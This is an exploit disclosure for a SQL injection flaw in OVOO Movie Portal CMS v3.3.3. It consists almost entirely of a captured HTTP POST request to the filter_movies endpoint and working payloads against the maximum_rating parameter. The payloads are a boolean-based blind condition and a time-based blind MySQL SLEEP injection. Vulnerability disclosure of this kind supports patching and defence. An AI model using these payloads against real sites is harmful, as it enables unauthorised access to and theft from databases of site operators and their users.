# Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection # Date: 2023-08-12 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569 # Tested on: Kali Linux & MacOS # CVE: N/A ### Request ### POST /filter_movies/1 HTTP/2 Host: localhost Cookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495us User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/movies.html Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 60 Origin: htts://localhost Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers action=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1 ### Parameter & Payloads ### Parameter: maximum_rating (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND 2238=2238&page=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT 4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1